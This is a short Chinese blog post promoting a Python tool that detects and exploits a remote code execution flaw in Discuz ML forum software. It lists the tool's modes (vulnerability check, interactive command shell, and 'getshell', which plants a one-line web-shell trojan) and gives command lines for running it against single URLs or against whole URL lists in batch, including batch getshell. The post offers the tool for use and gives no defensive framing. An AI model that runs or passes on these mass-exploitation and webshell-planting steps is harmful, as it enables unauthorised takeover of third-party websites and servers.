Discuz ML RCE 漏洞批量检测利用工具

2019年7月17日08:30:42 发表评论

工具说明

本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。使用时加上漏洞PHP页面如(forum.php,portal.php),直接写域名可能会重定向导致误报。

环境插件

python2.7
pip -r requirements.txt

使用方法

判断模式
python dzml.py -u "https://test.agesec.com/forum.php"

cmdshell模式
python dzml.py -u "https://test.agesec.com/forum.php" --cmdshell

getshell模式
python dzml.py -u "https://test.agesec.com/forum.php" --getshell

批量检测
python dzml.py -f urls.txt

批量getshell
python dzml.py -f urls.txt --getshell

Discuz ML RCE 漏洞批量检测利用工具

发表评论

后发表评论